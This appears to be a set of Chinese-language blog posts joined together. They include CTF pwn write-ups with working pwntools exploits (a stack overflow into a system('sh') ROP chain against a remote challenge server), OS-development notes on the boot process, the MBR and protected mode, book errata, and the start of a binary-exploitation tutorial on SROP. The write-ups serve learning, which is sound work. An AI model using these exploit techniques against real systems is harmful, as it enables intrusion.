        b"A" * 0x2D,
        elf.sym["get_secret"],
        elf.sym["write"],
        elf.sym["exit"],
        constants.STDOUT_FILENO,
        elf.bss() + 0xAAD,
        1337,
    )
    target.sendline(payload)

    target.interactive()


if __name__ == "__main__":
    main()

ciscn_2019_en_2

Information

Category: Pwn
Points: 1

Write-up

不理解，这题和 ciscn_2019_c_1 不是一样的吗？

Exploit

Same as ciscn_2019_c_1.

ciscn_2019_ne_5

Information

Category: Pwn
Points: 1

Write-up

// bad sp value at call has been detected, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  int v4; // [esp+0h] [ebp-100h] BYREF
  char src[4]; // [esp+4h] [ebp-FCh] BYREF
  char v6[124]; // [esp+8h] [ebp-F8h] BYREF
  char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
  _BYTE v8[96]; // [esp+88h] [ebp-78h] BYREF
  int *p_argc; // [esp+F4h] [ebp-Ch]

  p_argc = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(v8, 0, sizeof(v8));
  *(_DWORD *)src = 48;
  memset(v6, 0, sizeof(v6));
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf("%100s", s1);
  if ( strcmp(s1, "administrator") )
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  while ( 1 )
  {
    puts("Input your operation:");
    puts("1.Add a log.");
    puts("2.Display all logs.");
    puts("3.Print all logs.");
    printf("0.Exit\n:");
    __isoc99_scanf("%d", &v4);
    switch ( v4 )
    {
      case 0:
        exit(0);
        return result;
      case 1:
        AddLog((int)src);
        break;
      case 2:
        Display(src);
        break;
      case 3:
        Print();
        break;
      case 4:
        GetFlag(src);
        break;
      default:
        continue;
    }
  }
}

bypass password 没啥好说的，main 函数中 __isoc99_scanf("%100s", s1); 虽然可以破坏一些栈布局，但是程序下面有个 while 死循环，以致 main 不会返回，所以肯定不能通过这个输入构造 ROP Chain.

继续往下看，while 里面的 scanf 也没有漏洞，不过发现一个隐藏选项 4。一个一个看，AddLog 里面有一个 scanf，接收 128 字节，可以破坏栈布局，但是也不能用它构造 ROP Chain，因为AddLog 是返回读取到的字节数，返回后又是一轮循环。

int __cdecl AddLog(int a1)
{
  printf("Please input new log info:");
  return __isoc99_scanf("%128s", a1);
}

Display 可以泄漏栈内容，或许有用，先放一边。

Print 里面调用了一个 system，说明我们可以直接用 system@plt 调用这个函数。

GetFlag 将我们输入 buffer 的内容直接复制到 dest，由于这个 dest 是局部数组，只有 4 字节空间，strcpy 没有安全检查，我们可以利用这一点篡改 GetFlag 栈帧的返回地址为 ROP Chain.

int __cdecl GetFlag(char *src)
{
  char dest[4]; // [esp+0h] [ebp-48h] BYREF
  _BYTE v3[60]; // [esp+4h] [ebp-44h] BYREF

  *(_DWORD *)dest = 48;
  memset(v3, 0, sizeof(v3));
  strcpy(dest, src);
  return printf("The flag is your log:%s\n", dest);
}

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    fit,
    process,
    raw_input,
    remote,
)

FILE = "./ciscn_2019_ne_5"
HOST, PORT = "node5.buuoj.cn", 27219

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    target.sendlineafter(b"password:", b"administrator")

    payload = fit(
        {
            0x4C: elf.plt["system"],
            0x50: elf.plt["exit"],
            0x54: next(elf.search(b"sh")),
        }
    )
    # raw_input("DEBUG")
    target.sendlineafter(b"Exit", str(1).encode())
    target.sendlineafter(b"info:", payload)
    target.sendlineafter(b"Exit", str(4).encode())

    target.interactive()


if __name__ == "__main__":
    main()

Exordium Operating System Development Notes

Sun, 09 Mar 2025 00:00:00 GMT

import GithubCard from "@components/misc/GithubCard.astro";

前言

为了提升开发水平和工程能力，同时也是为了深入学习 C 语言……我再次拾起了这项艰巨却让我无比向往的项目<s>（种子早在两年前就种下了，现在才开始生长，请叫我摆烂 Master）</s>。

话说今年（确切的说应该是截至九月中旬）我主要功夫都会倾注在学业中，这意味着，我能投身于技术探索的时间将变得稀缺（这怎么行，我怎么能原地踏步！所以，即便当前以学业为主，我也打算在这段时间顺便积淀一下自己的硬实力。待到回归之日，又是一个更哇塞的自己～）……

借口？或许吧……刚开学前两周经受了一个「小小的」挫折，让我有「一点点」崩。唉，说多了都是泪……没死就好 LOL

主要参考书籍是**《操作系统真象还原》**，这本书体量和 CSAPP 有一拼……

记录一下，我是从 03/09/2025 正式开始的，<s>虽然还没写下任何一行代码，但准确来说就是这个点……</s>只是想在最后看看什么时候结束，届时可能会小小的感慨一下下吧。

<br />

计算机启动过程

实模式下的 1MB 内存布局

为何是 1MB？这得追溯到 Intel 8086 的时代了。那时候 Intel 8086 只有 20 根地址总线，故其只能访问 $$2^{20} =1048576$$ 字节，也就是 1MB 的内存空间，而这 1MB 又被拆为多个部分分别用于不同的用途。

实模式下的内存布局如下：

起始	结束	大小	用途
0xFFFF0	0xFFFFF	16B	BIOS 入口地址，此地址也属于 BIOS 代码，同样属于顶部的 64KB 字节。只是为了强调其入口地址才单独贴出来。此处 16 字节的内容是跳转指令 jmp F000:E05B
0xF0000	0xFFFEF	64KB-16B	系统 BIOS 范围是 F0000~FFFFF 共 64B，为了说明入口地址，将最上面的 16 字节从此处去掉了，所以此处终止地址是 0xFFFEF
0xC8000	0xEFFFF	160KB	映射硬件适配器的 ROM 或内存映射式 I/O
0xC0000	0xC7FFF	32KB	显示适配器 BIOS
0xB8000	0xBFFFF	32KB	用于文本模式显示适配器
0xB0000	0xB7FFF	32KB	用于黑白显示适配器
0xA0000	0xAFFFF	64KB	用于彩色显示适配器
0x9FC00	0x9FFFF	1KB	EDBA (Extended BIOS Data Area)
0x7E00	0x9FBFF	622080B，约 608KB	可用区域
0x7C00	0x7DFF	512B	MBR 被 BIOS 加载到此处
0x500	0x7BFF	30464B，约 30KB	可用区域
0x400	0x4FF	256B	BIOS Data Area
0x00	0x3FF	1KB	Interrupt Vector Table

计算机的启动过程

当按下主机上的 Power 键后，CPU 的 CS:IP 被强制初始化为 0xF000:0xFFF0. 由于刚开机时处于实模式，故段部件将段地址左移四位再加上偏移地址，得到物理地址 0xFFFF0，也就是是 BIOS (Basic Input/Output System) 的入口地址。所以第一个被运行的软件是 BIOS. BIOS 主要负责通过硬件提供的基本调用来检测、初始化硬件，除此之外，它还建立了最基本的 中断向量表 (Interrupt Vector Table, IVT)，之所以说是最基本，是因为 BIOS 就 64KB 大，不可能把所有的硬件 I/O 操作都实现得面面俱到，并且也没必要实现那么多，因为这是在实模式，对硬件支持的再丰富也白搭，精彩的世界是从进入保护模式后才开始的，所以它只挑了一些最重要的、保证计算机能运行的那些最基本的硬件 I/O 操作实现。

[!TIP] 因为 BIOS 是计算机上第一个运行的软件，所以它不可能自己加载自己，而是由只读存储器 ROM 这个硬件加载的。

BIOS 存在于主板上的 ROM 中，硬件将这个 ROM 的地址映射到低端 1MB 内存的顶部，也就是 0xF0000~0xFFFFF 处。

因为实模式下只能访问到 1MB 的空间，而 0xFFFF0 距 1MB 只剩可怜的 16 字节了，在这么小的空间里我们着实做不了太多操作，故在此放的是一条跳转指令，通过 jmp F000:E05B 跳转到 0xFE05B 处继续执行，也就是说真正的 BIOS 代码是从 0xFE05B 开始的。

接下来 BIOS 便马不停蹄地检测内存、显卡等外设信息，当所有检测通过，并初始化好硬件后，便在 0x00~0x03FF 处建立中断向量表，并向其中填写中断例程。

计算机执行到这份上，BIOS 也即将完成它这短暂的一生的使命了，完成之后，它又将沉沉睡去。想到这里，心里不免一丝忧伤，甚至有些许挽留它的想法。可是，这就是它的使命，它生来被设计成这样，它这短暂的一生已经为后人创造了足够的精彩。何况，在下一次开机时，BIOS 还会重复这段轮回，它并没有消失……多么伟大啊！好了，让伤感停止，让梦想前行！

BIOS 的最后一项工作是去校验启动盘中位于 0 盘 0 道 1 扇区 的内容。如果此扇区末尾的两个字节分别为 0x55 和 0xAA，BIOS 便认为此扇区中存在可执行程序，也就是 主引导记录 MBR (Main Boot Record)，随即将其加载到 0x7c00 处，并跳转到该地址继续执行。

为什么一定是 0 盘 0 道 1 扇区，而不是其它地方？对于这个问题，简单来说就是为了方便 BIOS 找到 MBR。想象一下，如果不存在这一规定，BIOS 就只得将所有检测到的存储设备上的的每一个存储单位都翻一遍，挨个对比，如果发现该存储单位的最后两字节为 0x55 和 0xAA，就认为它是 MBR. 几经花开花落，找到 MBR 的那一刻，BIOS 满脸疲惫地说：「你是我找了好久的那个人。」MBR 抬起经不起岁月等待的脸：「难得你还认得我，我等你等的花儿都谢了。」其实 BIOS 的心声是：「看我手忙脚乱的样子，你们这是要闹哪样啊。就这么 512 字节的内容，害我找遍全世界，我们这是在跑接力赛啊，下一棒的选手我都不知道在哪里……以后让它站在固定的位置等我！」

由于 0 盘 0 道 1 扇区是磁盘的第一个扇区，MBR 选择了这个离 BIOS 最近的位置站好了，从此以后再也不用担心被 BIOS 骂了。

总之，计算机中到处都有写死的东西，各种各样的魔数层出不穷，0xAA55 也是其中之一，这个就不解释了，当成规定/协议理解吧……

至于 0x7c00 是怎么来的，倒是可以解释一下。0x7c00 最早出现于 1981 年 8 月，IBM 公司推出的个人计算机 PC 5150 的 ROM BIOS 的 INT 19H 中断处理程序中。PC 5150 是世界上第一台个人计算机，它就是现代 x86 个人计算机兼容机的祖先。

个人计算机肯定要运行操作系统，在这台计算机上，运行的操作系统是 DOS 1.0。不清楚此系统要求的最小内存是 16KB 还是 32KB，反正 PC 5150 BIOS 研发团队就假定其是 32KB 的，所以此 BIOS 是按照最小内存 32KB 研发的。

MBR 不是随便放在哪里都行的，首先它不能覆盖已有数据，其次，它还不能过早的被其它数据覆盖。MBR 的任务是加载某个程序（一般是内核加载器，很少有直接加载内核的）到指定位置，并将控制权交给它。之后，MBR 就没用了，被覆盖也没关系（我指的覆盖是覆盖 0x7c00 处的指令，因为 MBR 本身也是被加载到那个位置执行的，而非硬盘上所保存的 MBR，覆盖了硬盘上保存的 MBR 下次就不能启动了），但在此之前，得确保它的完整性。

重现一下当时的内存使用情况：

8086 CPU 要求 0x00~0x03FF 存放中断向量表，所以此处就不能动了，再选新的地方看看。按 DOS 1.0 要求的最小内存 32KB 来说，MBR 希望给人家尽可能多的预留空间，这样也是保全自己的作法，免得被过早覆盖。所以 MBR 只能放在 32KB 的末尾。

MBR 本身也是程序，是程序就要用到栈，栈也是在内存中的，虽然 MBR 本身只有 512 字节，但还要为其所用的栈分配点空间，所以其实际所用的内存空间要大于 512 字节，估计 1KB 内存够用了。

结合以上几点，选择 32KB 中的最后 1KB 最为合适。32KB 转换为十六进制是 0x8000，减去 1KB (0x400) 的话，正好等于 0x7c00。这就是备受质疑的 0x7c00 的由来！

实现一个简单的 MBR

最后，让我们写一个简单的程序来验证一下我们所学到的理论知识的正确性。

项目结构为：

.
├── boot
│   └── mbr.s
└── Makefile

section mbr vstart=0x7c00
  mov ax, 0x0600 ; clear screen
  mov bh, 0x07   ; color attribute 0x07
  xor cx, cx     ; upper left corner
  mov dx, 0x184f ; bottom right corner
  int 0x10

  mov ah, 0x03   ; get cursor position
  xor bh, bh     ; video page 0
  int 0x10

  mov cx, 0x03   ; length of string
  mov ax, 0x1301 ; write string, move cursor
  mov bx, 0x07   ; video page 0, color attribute 0x07
  lea bp, [msg]  ; ES:BP is the pointer to string
  int 0x10

  jmp $

  msg db "MBR"

  times 510-($-$$) db 0
boot_flag:
  dw 0xAA55

以上，有关 int 0x10 视频中断的用法可以参考 INT 10 - Video BIOS Services.

这里我不得不吐槽一句：AT&T 语法珍尼 🐴 屎……

更有趣的是：

Intel Syntax Support

Up until v2.10 of binutils, GAS supported only the AT&T syntax for x86 and x86-64, which differs significantly from the Intel syntax used by virtually every other assembler. Today, GAS supports both syntax sets (.intel_syntax and the default .att_syntax), and even allows disabling the otherwise mandatory operand prefixes '%' or '$' (..._syntax noprefix). There are some pitfalls - several FP opcodes suffer from a reverse operand ordering that is bound to stay in there for compatibility reasons, .intel_syntax generates less optimized opcodes on occasion (try mov'ing to %si...).

It is generally discouraged to use the support for Intel Syntax because it can subtly and surprisingly different than the real Intel Syntax found in other assemblers. A different assembler should be considered if Intel Syntax is desired.

你可知我有多无语……我反复用 GAS 重构 nasm，用 nasm 重构 GAS……最终，也还是没有活下来，我还是被这狗屎语法打倒了。学到了：珍惜生命，远离 GAS……不过倔强的精神告诉我，我以后大概还是会用 GAS 来重构，至于原因……Linux 内核用的就是这个……什么是自虐？我这就是……

AS = nasm
DD = dd bs=512 conv=notrunc
IMG = exordium.img
IMG_SIZE = 60M

all: boot/mbr create_img write_mbr

boot/mbr: boot/mbr.asm
 $(AS) -I boot -o $@ $<

create_img:
 qemu-img create -f raw $(IMG) $(IMG_SIZE)

write_mbr: boot/mbr
 $(DD) if=$< of=$(IMG) count=1

clean:
 rm -rf boot/mbr
 rm -f $(IMG)

使用 make clean && make 编译上述程序，并生成系统镜像。

之后，使用这个 start.sh 来模拟：

#!/bin/bash

IMG="exordium.img"

qemu-system-i386 -drive file=$IMG,format=raw,if=ide,index=0 -s -S -monitor stdio

使用下面这个 debug.sh 开启 gdb 以调试：

#!/bin/sh

gdb -ix gdb/.gdbinit \
  -ex 'set tdesc filename gdb/target.xml' \
  -ex 'target remote localhost:1234'

我们 gdb 中直接 (c) continue，看到 MBR 三个大字被输出在屏幕上，就意味着我们成功地向 MBR 迈出了第一步，壮举！

[!TIP] 如果你通过 gdb 查看开机后运行的第一条指令，会发现这条指令并不符合我们的预期，这是因为 gdb 是按照 32-bit 指令格式进行解析指令的，而不是 16-bit 指令格式。

所以如果你想查看开机后运行的第一条指令的话，可以在启动虚拟机的指令后面加上 -monitor stdio 参数，之后在 qemu 控制台使用 x/10i $cs*16+$eip 指令来进行查看。

结果如下：
(qemu) x/10i $cs*16+$eip
0x000ffff0:  ea 5b e0 00 f0           ljmpw    $0xf000:$0xe05b
0x000ffff5:  30 36 2f 32              xorb     %dh, 0x322f
0x000ffff9:  33 2f                    xorw     (%bx), %bp
0x000ffffb:  39 39                    cmpw     %di, (%bx, %di)
0x000ffffd:  00 fc                    addb     %bh, %ah
0x000fffff:  00 00                    addb     %al, (%bx, %si)
0x00100001:  00 00                    addb     %al, (%bx, %si)
0x00100003:  00 00                    addb     %al, (%bx, %si)
0x00100005:  00 00                    addb     %al, (%bx, %si)
0x00100007:  00 00                    addb     %al, (%bx, %si)
其实还有别的方法，比如直接用 bochs，它很好的支持 16-bit 指令等内容，你也可以手动 patch qemu，或者简单点，如果你还是想用 qemu + gdb 的话，在我的项目根目录下有一个 gdb 目录，包含了 16-bit 调试的拓展脚本，并且可以自动在进入保护模式后切换到 32-bit 架构，实现正确解析不同架构之间的指令。

参考：The only proper way to debug 16-bit code on Qemu+GDB.

Loader，我们的救星

由于 MBR 受限于 512 字节大小的空间，显然，这么点小小的空间肯定不足以我们将内核加载进内存并运行。所以一个很自然的想法就是，实现一个 Loader，用它来初始化环境并加载内核。

Loader 应该被 MBR 从硬盘读取到内存后执行，那我们应该将 Loader 写在硬盘中什么位置呢？我们知道 MBR 已经占据了第 0 扇区（LBA 扇区从 0 开始编号），那我们把它放到第 1 扇区？当然可以，但是离得那么近，心理多少有点不踏实，还是隔开点好了……那就放到第 2 扇区好啦～那么现在的问题是，我们把它加载到哪里好呢？理论上任何一块空闲空间都可以，参考实模式下的 1MB 内存布局可知，0x0500~0x7BFF 和 0x7E00~0x9FBFF 都是空闲内存。由于未来 Loader 中需要定义一些数据结构，比如 GDT，这些数据结构将来的内核还需要使用，所以 Loader 加载到内存后不能被覆盖；其次，随着我们不断添加功能，内核必然越来越大，其所在的内存地址也会向越来越高的的地方发展，难免会超过可用区域的上限，所以应该尽量把 Loader 放在低处，多留一些空间给内核。但……我选择效仿 Linux 内核的设计，把它加载到了 0x90000 这个位置，大家随意～

有关硬盘的操作，可以参考 AT Attachment with Packet Interface.

至于代码嘛……如果我每次新增了什么代码都复制一份贴到博客里显然有点多余，显得过于杂乱了。所以劳烦您自行阅读我提交的 source code. 仓库地址在前言底部已经给出。

进入保护模式

一个新的模式的出现一定是为了取代旧有的模式，它一定是为了解决原先模式的一些缺陷而生的。

实模式是在有了 32-bit CPU 后才提出的，和纯粹的 16-bit CPU，8086 等无关。提出「实模式」的概念只是为了和有了 32-bit CPU 之后诞生的「保护模式」相区分，仅此而已。另外，实模式的运行环境是 16-bit，而保护模式的运行环境是 32-bit.

虽然有了保护模式，但之前实模式下的程序还得兼容，因此在「实模式」和「保护模式」之间还有个过渡模式，即「虚拟 8086」模式。

简单罗列一些实模式下的缺陷：

实模式下操作系统和用户程序处于同一特权级，这哥俩平起平坐，没有区别对待。
用户程序所引用的地址都是指向真实的物理地址，也就是说逻辑地址等于物理地址，实实在在的指哪打哪。
用户程序可以自由修改段基址，可以不亦乐乎地访问所有内存，没人拦得住。
访问超过 64KB 的内存区域时要切换段基址，转来转去容易晕乎。
一次只能运行一个程序，无法充分利用计算机资源。
共 20 条地址总线，最大可用内存为 1MB，这即使在当时也不够用。

前三点属于安全缺陷，第四、五点是使用方面的缺陷，似乎当时还可以勉强忍受一下，但最后一条就是硬伤，随着计算机事业的发展，程序对内存的需求必然越来越大，如果还是 1MB 内存，那真的是束手无策。

CPU 发展到 32-bit 后，地址总线和数据总线也发展到了 32-bit，其寻址空间达到了 $$2^{32} =4294967296$$ 字节，也就是 4GB 范围。寻址空间上去了，寻址方法还是老一套的「段基址:段内偏移地址」，因此如果还是维持 16-bit 的寄存器大小，肯定无法承担 4GB 的寻址重任。因此，保护模式下寄存器宽度也得到了提升，除段寄存器外，通用寄存器、指令指针寄存器和标志寄存器都由原先的 16-bit 扩展到了 32-bit，这样一来，单独的一个寄存器就可以访问到 4GB 空间的每一个角落，段地址可以为 0，开启了「平坦模式」的时代，大大方便了开发者的工作。

至于保护模式中对安全性的改进，主要是体现在段寄存器的用途上面。保护模式建立了 全局描述符表 (Global Description Table, GDT) 的概念，其中每一个表项称为段描述符，大小为 8 字节，用来描述各个内存段的起始地址、大小和权限等信息，当有实际动作在这片内存上发生时，CPU 就根据这些属性来检查动作的合法性，从而起到了保护的作用。GDT 存储在内存中，由 GDTR 寄存器负责指向这张表的起始位置。这样，原先的段寄存器存放的不再是一个简单的段基址，而是一个叫做 选择子 (Selector) 的东西，它相当于一个索引，将从 GDT 中找到对应的段基址，再加上偏移地址，通过这种方式来确定地址。

选择子的结构如下：

Index 相当于段描述符的索引值，用此值在 GDT 中索引描述符。由于这部分一共有 13-bits，故可以索引 $$2^{13} =8192$$ 个段。
TI (Table Indicator) 指示使用哪张描述符表，为 0 表示在 GDT 中索引段描述符，为 1 则在 LDT 中索引。
RPL (Requested Privilege Level) 可以表示 0、1、2、3 四种特权级。

而下图就是 GDT 表项的结构了，其中灰色的那位是 L (Long Mode) 位，用于指示是 32-bit 还是 64-bit.

有关不同位的含义，可以参考 Global Descriptor Table，这里不再赘述。

通过上图你也看到了，像是段基址，段界限值，它们都被分割开来了，而不是连续存储的，这导致 CPU 还要对这些七零八落的数据进行重组，拼成一个完整的数据……还有访问内存中的段描述符，这些都需要时间，CPU 可等不起。因此，为了提高获取段信息的效率，将段信息缓存到了 段描述符缓存 (Segment Descriptor Cache)。每个段寄存器都有一个 hidden part，叫做段描述符缓存，它只有 CPU 可操作，CPU 每次将历经千辛万苦获取到的段信息整理成完整的、通顺、不蹩脚的形式后，存入段描述符缓存，以后每次访问相同的段时，就直接读取该段寄存器对应的的段描述符缓存。

[!TIP] 虽然段描述符缓存是保护模式下的产物，但也可以用在实模式下。因为每次都将段基址左移 4 位也算一个不小的操作，所以也可以将移位后的结果缓存起来供下次使用。

至于这个缓存的失效时间，还真没个「准」。段描述符缓存不会自动刷新，只有当 CPU 重新加载段寄存器时才会更新。

比如这会刷新缓存：

mov ax, 0x10
mov ds, ax

这样则不会刷新段描述符缓存寄存器：

mov ax, ds
mov ds, ax

因此，除非手动重新加载段寄存器，否则 CPU 会一直使用旧的缓存，即使 GDT/LDT 已被修改。

此外，保护模式下寻址方式也得到了极大的扩展，灵活性得到了极大的提高。基址寄存器不再只能用 BX、BP，而是所有 32-bit 通用寄存器，变址寄存器也一样，不再只是 SI、DI，而是除 ESP 之外的所有 32-bit 通用寄存器。偏移量也从 16-bit 变成了 32-bit，并且，还可以对变址寄存器乘以一个比例因子，不过出于内存对齐的考虑，比例因子只能是 1、2、4、8。

还有一些杂七杂八的，比如指令扩展啦，运行模式反转啦之类的，不过我呀，是写不动了<s>（改天也不一定会写的）</s>，有兴趣的自己看书查资料去吧～

最后说说进入保护模式需要做的三件事：

加载 GDT
打开 A20 Gate
将 CR0 的 PE (Protection Enable) 位置 1

这三个步骤可以不顺序，也不连续。至于实现，还是移步我的 GitHub 看实际代码好了，懒得写了……/逃

开发日志

Mar 12, 2025 Yeeee! 我终于正式写下了 Exordium 的第一行代码<s>（其实是好几行……）</s>。从此，接力棒由 BIOS 传到了 MBR 之手，真是值得庆祝的一刻呢！
Mar 17, 2025 TNND 使用 GAS 重构。
Mar 19, 2025 实现了一个简单的 Loader.
Mar 20, 2025 使用 I/O 处理机传送方式优化 in/out 的传送方式。
Mar 24, 2025 吐血，使用 NASM 重构……进入保护模式、GDB 实模式拓展脚本。
Apr 2, 2025 检测可用 RAM 的总大小。
Apr 13, 2025 开启内存分页机制。

书中的勘误

基于 《操作系统真象还原》（2022.10 重印）。

虽然可能错的是我，但并不妨碍我写出来。欢迎一起讨论～

第 0 章：一些你可能正感到迷惑的问题

0.2 你想研究到什么程度

三处 $$4\times 4\times 4$$ 应修改为 $$4+4+4$$。

0.15 局部变量和函数参数为什么要放在栈中

栈由于是向下生长的，堆栈框架就是把 esp 指针提前加一个数，原 esp 指针到新 esp 指针之间的栈空间用来存储局部变量。

这里应该说是提前减一个数才对，因为栈是从高地址向低地址生长的，所以创建栈帧是减，清理才是加。

第 1 章：部署工作环境

1.3 操作系统的宿主环境

在编译中要加 -lpthread 参数。用 vim 编译 makefile，vim 是 Linux 下功能最为强大的文本编辑器。vim Makefile 回车：

此处有个小小的 typo：「用 vim 编译 makefile」应改为「用 vim 编辑 makefile」。

第 2 章：编写 MBR 主引导记录，让我们开始掌权

2.2 软件接力第一棒，BIOS

这里存在一个表格内部的 typo，原表格如下：

起始	结束	大小	用途
FFFF0	FFFFF	16B	BIOS 入口地址，此地址也属于 BIOS 代码，同样属于顶部的 640KB 字节。只是为了强调其入口地址才单独贴出来。此处 16 字节的内容是跳转指令 jmp F000:E05B

修改为属于顶部的 64KB 字节而不是 640KB：

起始	结束	大小	用途
FFFF0	FFFFF	16B	BIOS 入口地址，此地址也属于 BIOS 代码，同样属于顶部的 64KB 字节。只是为了强调其入口地址才单独贴出来。此处 16 字节的内容是跳转指令 jmp F000:E05B

第 3 章：完善 MBR

3.1.3 什么是 vstart

两处「code.节名.start」应修改为「section.节名.start」。

3.2.2 实模式下的寄存器

还是 typo：「IP 寄存器是不可见寄存器，CS 寄存器是可见寄存器。这两个配合在一起后就是 CPU 的罗盘，它们是给 CPU 导航用的。CPU 执行到何处，完成要听从这两个寄存器的安排。」，「完成」应改成「完全」。

3.2.4 实模式下 CPU 内存寻址方式

直接寻址这里，「第二条指令中，由于使用了段跨越前缀 fs，0x5678 的段基址变成了 gs 寄存器。」这里不应该是 gs 寄存器，而是 fs 寄存器才对。

3.2.7 实模式下的 call - 16 位实模式相对近调用

「指令中的立即数地址可以是被调用的函数名、标号、立即数，函数名同标号一样，它只是地址的人性化表示方法，最终会被编译器转换为一个实际数字地址，如 call near prog_name。」这里「prog_name」应改为同下文一样的「proc_name」。

「这好办，咱们上 bochs 看，让其边执行边反汇编给咱们看结果。下面粗体的文件是我加的注释说明。」这里「文件」应该改成「文字」吧。改成「文字」的话，排版上也存在问题，因为贴出来的额外注释字体并不是呈粗体的。还有一种可能是，作者将 > (markdown cite syntax) 引用格式的排版描述为粗体，将引用内容描述成文件，不过这样理解的话也会引出一个争端：引用的内容称为「文件」并不合适，如果一定要用「文件」这个词语的话，我觉得写成「文件内容」更好。

3.3.1 CPU 如何与外界设备通信——IO 接口

「再说，同任何一个设备打交道，CPU 那么速度那么快，它不得嫌弃别人慢吗……」多打了一个「那么」。

3.5.3 硬盘控制器端口

「有些命令需要指定额外参数，这些参数就写在 Fea ture 寄存器中。」这里的问题是「Fea ture」中多打了一个空格，应改成「Feature」。

3.6.1 改造 MBR

「我们的 MBR 受限于 512 字节大小的，在那么小的空间中……」多打了一个「的」。

「在寄存器 eax 中的是待读入的扇区起始地址，赋值后 eax 为定义的宏 LOADER_START_ SECTOR，即 0x2。」这里「LOADER_START_ SECTOR」多打了一个空格，应改为「LOADER_START_SECTOR」。

「段内偏移地址正因为是 16 位，只能访问 64KB 的段空间，所以才将段基址乘以 16 来突破这 64KB，从而实现访问低调 1MB 空间的。」这里可能是多打了一个「低调」，也可能是多打了一个「调」。

3.6.2 实现内核加载器

「这次我只抓了一张图，但我人格保证这是跳动的字符……」，「人格」与「人品」是有区别的吧，这里用「人格」感觉并不合适，应该用「人品」 xD

第 4 章：保护模式入门

4.2.1 保护模式之寄存器扩展

「其中每一个表项称为段描述符，其大小为 64 字节」，我滴个乖乖，一个表项 64 字节有点虾仁了啊，其实是 64 比特，8 字节。

大麻烦来了，我觉得作者写的描述符缓存寄存器的失效时间的这部分内容存在一点小小的逻辑问题，书上写的「即使新选择子的值和之前段寄存器中老的选择子相同，CPU 就会重新访问全局描述符表，再将获取的段信息重新放回段描述符缓存寄存器」和「在 16 位环境下，无论是否与之前的段基址相同，段基址左移 4 位后的结果就被送入段描述符缓存寄存器」，既然不管有没有改变段寄存器的值都要重新访问 GDT，那缓存的意义何在？对此，我写了下自己的一点拙见，见进入保护模式中有关对缓存失效时间的描述。

4.3.1 段描述符

「内存访问需要用到『段其址:段内偏移地址』……」，是「段地址」吧，怎么打成了「段其址」。

4.3.5 让我们进入保护模式

代码 4-2 中第 27 行：

DESC_VIDEO_HIGH4 equ (0x00 << 24) + DESC_G_4K + DESC_D_32 + \
DESC_L + DESC_AVL + DESC_LIMIT_VIDEO2 + DESC_P + \
DESC_DPL_0 + DESC_S_DATA + DESC_TYPE_D ATA + 0x00

DESC_TYPE_D ATA 中间多了一个空格，应改为 DESC_TYPE_DATA.

同代码 4-2，第 13 行：

DESC_LIMIT_VIDEO2 equ 0000_000000000000000b

这里全部置零肯定是有问题的，拼不出段基址 0xb8000。应该改成：

DESC_LIMIT_VIDEO2 equ 0000_0000000000001011b

第 5 章：保护模式进阶，向内核迈进

5.2.5 启用分页机制

对代码 5-4 的解释，「第 152~153 行，是为了重启加载 GDT 做准备。」，这应该是「重新」吧，怎么能是「重启」。

Beyond Basics: The Dark Arts of Binary Exploitation

Sat, 01 Feb 2025 00:00:00 GMT

前言

自 23 年刚推开 Pwn 之门的一条窄缝以来，一直有着这样一个想法：「写一份有关 Pwn 的详细教程，又或许是经验梳理与总结，让有志之士从入门到入坟，少走弯路，不那么痛苦。」~伟大吗？~

本来想用 GitBook 或者建一个类似 wiki 的平台来写这个的，不过最终还是决定放在这里，为啥？我不知道……

不过我可能不会经常更新这篇 blog，而是 Keep updating as the mood strikes. 但是请放心，不论你现在看到的这篇文章有多简陋……给我点时间，未来它一定会成为一本不错的参考手册！

莫欺少年穷，咱顶峰相见。

<p style="text-align: right;">——以上，书于 02/01/2025</p> <p style="text-align: right;">更新于 09/10/2025</p>

Flush or Be Flushed: C I/O 缓冲区的秘密生活

stdout 有三种缓冲模式：

行缓冲 (line-buffered) 只有在输出 \n 时才 flush（前提是目标是终端 tty）
全缓冲 (fully-buffered) 只有缓冲区填满或程序结束才 flush
无缓冲 (unbuffered) 每次写都会 flush

默认规则是：

如果 stdout 指向终端 (tty)，则为行缓冲
如果 stdout 被重定向到 pipe / socket / file 则为全缓冲

Path or Be Pathed: The angr Edition

有关于我符号执行的学习记录，请移步分岔的森林：angr 符号执行札记。

上帝掷骰子？不，其实是线性同余

rand 生成的是伪随机数，范围是 $[ 0,RAND_MAX]$，只要 seed 相同就可以「预测」：

import ctypes

libc = ctypes.CDLL("./libc.so.6")

# libc.srand(1)
predicted = libc.rand()

:::tip 没有使用 srand 设置 seed 的，默认为 srand(1)。 :::

一环套一环：ROP 链与栈上的奇技淫巧

ret2csu

我在 ROP Emporium - Challenge 8 写的已经很详细了，最近比赛赶时间，等我打完之后再来慢慢完善吧，只能暂且劳请各位老爷们先凑合着看了<s>（如果有人看的话。/真叫人伤心）</s>。

SROP

Principle

Okay, the first thing, what is SROP?

SROP (Signal Return Oriented Programming)，思想是利用操作系统信号处理机制的漏洞来实现对程序控制流的劫持。

首先得知道，信号是操作系统发送给程序的中断信息，通常用于指示发生了一些必须立即处理的异常情况。

而 sigreturn 则是一个特殊的 syscall，负责在信号处理函数执行完后根据栈上保存的 sigcontext 的内容进行清理工作（还原到程序在进行信号处理之前的运行状态，就好像什么都没有发生一样，以便于接着运行因中断而暂停的程序）。它帮助程序从 Signal Handler（泛指信号处理函数）中返回，并通过清理信号处理函数使用的栈帧来恢复程序的运行状态。

我们知道，在传统的 ROP 中，攻击者可以利用程序中已存在的 gadgets 构造一个指令序列来执行恶意代码。SROP 则在此基础上利用了信号处理机制的漏洞，在信号处理函数的上下文切换中执行攻击，实现一次控制所有寄存器的效果。

攻击步骤大致如下：

攻击者通过在栈上伪造 sigcontext 结构来为控制寄存器的值做准备。一般会在这一步设置好后续 ROP Chain 中恶意代码要用到的参数，需要注意的是没有设置的寄存器在执行 sigreturn 后会被 zero out.
